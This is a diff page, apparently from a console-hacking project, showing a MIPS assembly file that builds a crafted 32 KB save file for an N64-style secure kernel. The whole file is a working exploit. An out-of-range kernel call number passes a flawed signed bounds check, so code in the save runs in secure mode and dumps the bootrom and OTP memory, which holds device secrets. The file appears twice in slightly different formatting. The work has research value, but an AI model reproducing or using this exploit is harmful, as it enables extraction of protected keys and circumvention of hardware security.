pixel-stuck · May 4, 2018 06:49
diff --git a/bootrom_otp_dump.s b/bootrom_otp_dump.s
 .n64                ; Set the architecture to N64
 .open "00200f70.sta",0x807C0000

 start:
  lui $v0, 0xF82E
  ori $v0, $v0, 0xD0AE ; set up out of range SKC 0xF82ED0AE. SK will use a flawed signed compare to be sure this is within the SKC table bounds. 
                       ; SK will check the bottom 5 bits, which when shifted left have to correspond to a bit in the allowed SKC bitmask, or the call fails.
                       ; then it does func_ptr = skc_num * 4 + 0x9FC0BDB0 (0x9FC0BDB0 being the skc func ptr table address) for a final result of 0x807C0068. 
                       ; The function pointer will be read from there.
  lui $t0, 0xA430
  ori $t0, $t0, 0x0014
  lw      $t1, 0($t0)
  nop
  bgez $zero, usermode_code

 .org 0x807C0068
  .word 0x807C006C ; Function ptr the SKC above will read from, pointing to the code right after this (will be executed in secure mode)
  lui $t1, 0xBFC2 ; bootrom address
  lui $t0, 0xBFC2
  ori $t0, $t0, 0x2000
  lui $t2, data_buf >> 16
  ori $t2, data_buf & 0xFFFF
 copy_loop:
  lw $t3, 0($t1)
  addi $t1, 4
  sw $t3, 0($t2)
  addi $t2, 4
  bne $t0, $t1, copy_loop
  nop
  lui $t1, 0xBFCA ; OTP address
  lui $t0, 0xBFCA
  ori $t0, $t0, 0x0100
 copy_loop2: ; second loop because I'm lazy and would rather not disturb $ra
  lw $t3, 0($t1)
  addi $t1, 4
  sw $t3, 0($t2)
  addi $t2, 4
  bne $t0, $t1, copy_loop2
  nop
  jr $ra ; jump back to SKC handler
  nop

 usermode_code:
 infloop:
  bgez $zero, infloop
  nop

 data_buf:

 .org 0x807C7FFC
  .word 0 ; pad to the end of the file so we get a 32 KB save
 .close

 ; make sure to leave an empty line at the end
	.n64 ; Set the architecture to N64
	.open "00200f70.sta",0x807C0000

	start:
	lui $v0, 0xF82E
	ori $v0, $v0, 0xD0AE ; set up out of range SKC 0xF82ED0AE. SK will use a flawed signed compare to be sure this is within the SKC table bounds.
	; SK will check the bottom 5 bits, which when shifted left have to correspond to a bit in the allowed SKC bitmask, or the call fails.
	; then it does func_ptr = skc_num * 4 + 0x9FC0BDB0 (0x9FC0BDB0 being the skc func ptr table address) for a final result of 0x807C0068.
	; The function pointer will be read from there.
	lui $t0, 0xA430
	ori $t0, $t0, 0x0014
	lw $t1, 0($t0)
	nop
	bgez $zero, usermode_code

	.org 0x807C0068
	.word 0x807C006C ; Function ptr the SKC above will read from, pointing to the code right after this (will be executed in secure mode)
	lui $t1, 0xBFC2 ; bootrom address
	lui $t0, 0xBFC2
	ori $t0, $t0, 0x2000
	lui $t2, data_buf >> 16
	ori $t2, data_buf & 0xFFFF
	copy_loop:
	lw $t3, 0($t1)
	addi $t1, 4
	sw $t3, 0($t2)
	addi $t2, 4
	bne $t0, $t1, copy_loop
	nop
	lui $t1, 0xBFCA ; OTP address
	lui $t0, 0xBFCA
	ori $t0, $t0, 0x0100
	copy_loop2: ; second loop because I'm lazy and would rather not disturb $ra
	lw $t3, 0($t1)
	addi $t1, 4
	sw $t3, 0($t2)
	addi $t2, 4
	bne $t0, $t1, copy_loop2
	nop
	jr $ra ; jump back to SKC handler
	nop

	usermode_code:
	infloop:
	bgez $zero, infloop
	nop

	data_buf:

	.org 0x807C7FFC
	.word 0 ; pad to the end of the file so we get a 32 KB save
	.close

	; make sure to leave an empty line at the end